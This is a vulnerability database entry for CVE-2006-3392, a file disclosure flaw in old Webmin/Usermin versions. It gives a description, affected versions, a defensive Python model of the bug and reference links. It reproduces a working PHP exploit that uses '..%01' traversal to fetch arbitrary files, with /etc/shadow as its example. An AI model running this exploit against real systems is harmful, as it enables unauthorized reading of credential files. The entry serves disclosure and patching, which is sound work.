Webmin/Usermin Unspecified Information Disclosure Vulnerability

Vulnerability ID: 1110588
Vulnerability type: Input validation
Published: 2006-07-09
Updated: 2006-10-24
CVE ID: CVE-2006-3392
CNNVD-ID: CNNVD-200607-036
Platform: Multiple
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/1997
https://www.securityfocus.com/bid/18744
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-036
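|Vulnerability details
Webmin before 1.290 and Usermin before 1.220 call the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, for example by using "..%01" sequences, which bypass the removal of "../" sequences before bytes such as "%01" are removed from the filename. Note: this vulnerability is different from CVE-2006-3274.
|Exploit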
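The ordering flaw described above, modelled in Python as an added example (not Webmin's code and not part of the original entry): `resolve_flawed` simplifies the path before decoding and stripping bytes, while `resolve_hardened` decodes first, simplifies last and checks containment. `DOCROOT`, the function bodies and the sample paths are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

DOCROOT = "/srv/webroot"              # constructed document root, not Webmin's
CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def simplify_path(path):
    """Resolve '.' and '..' segments; None if the path climbs above the root.
    A stand-in for the function named in the entry, not its source."""
    kept = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not kept:
                return None
            kept.pop()
        else:
            kept.append(seg)
    return "/" + "/".join(kept)


def resolve_flawed(raw):
    """Order described above: simplify, then decode, then drop control bytes."""
    simple = simplify_path(raw)          # '..%01' is not '..', so it survives
    if simple is None:
        return None
    cleaned = CONTROL.sub("", unquote(simple))   # '..%01' -> '..\x01' -> '..'
    # normpath stands in for what the OS does when the file is opened
    return posixpath.normpath(DOCROOT + cleaned)


def resolve_hardened(raw):
    """Decode once, refuse control bytes, simplify last, check containment."""
    decoded = unquote(raw)
    if CONTROL.search(decoded):
        return None
    simple = simplify_path(decoded)
    if simple is None:
        return None
    full = posixpath.normpath(DOCROOT + simple)
    inside = full == DOCROOT or full.startswith(DOCROOT + "/")
    return full if inside else None
```

The same request path that leaves the document root in the flawed order is rejected in the hardened order, because no byte is decoded or removed after the ".." check has run.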
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date :  2006-06-30
Patch : update to version 1.290
Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/

$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {


$z = "/..%01";
for ($i=0;$i<60;$i++) {
        $z.="/..%01";
}

$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";

echo "Attacking ".$host."\n";
echo "---------------------------------\n";

// INITIALIZING CURL SESSION TO THE TARGET

$ch = curl_init();

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

$content = curl_exec($ch);
curl_close ($ch);

// CLOSING CURL

// ECHOING THE CONTENT OF THE $FILE
echo $content;

echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";

} else {
        // IF INPUT IS NOT CORRECT DISPLAY THE README
        echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
        echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";
        echo "Coded by joffer , http://securitydot.net\n";
}

?>

# milw0rm.com [2006-07-09]
|Affected products
Webmin Webmin 1.280
Webmin Webmin 1.270
Webmin Webmin 1.260
Webmin Webmin 1.250
Webmin Webmin 1.240
Webmin Webmin 1.230
Webmin Webmin 1.220
|References

Source: US-CERT
Name: VU#999601
Link: http://www.kb.cert.org/vuls/id/999601
Source: OSVDB
Name: 26772
Link: http://www.osvdb.org/26772
Source: VUPEN
Name: ADV-2006-2612
Link: http://www.frsirt.com/english/advisories/2006/2612
Source: SECUNIA
Name: 21365
Link: http://secunia.com/advisories/21365
Source: SECUNIA
Name: 20892
Link: http://secunia.com/advisories/20892
Source: www.webmin.com
Link: http://www.webmin.com/changes.html
Source: BID
Name: 18744
Link: http://www.securityfocus.com/bid/18744
Source: BUGTRAQ
Name: 20060715 Webmin/Usermin Arbitrary File Disclosure Vulnerability Perl
Link: http://www.securityfocus.com/archive/1/archive/1/440493/100/0/threaded
Source: BUGTRAQ
Name: 20060709 Webmin/Usermin Arbitrary File Disclosure Vulnerability exploit
Link: http://www.securityfocus.com/archive/1/archive/1/439653/100/0/threaded
Source: GENTOO
Name: GLSA-200608-11
Link: http://security.gentoo.org/glsa/glsa-200608-11.xml
Source: SECUNIA
Name: 21105
Link: http://secunia.com/advisories/21105
Source: MANDRIVA
Name: MDKSA-2006:125
Link: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2006:125
Source: VIM
Name: 20060630Webmintr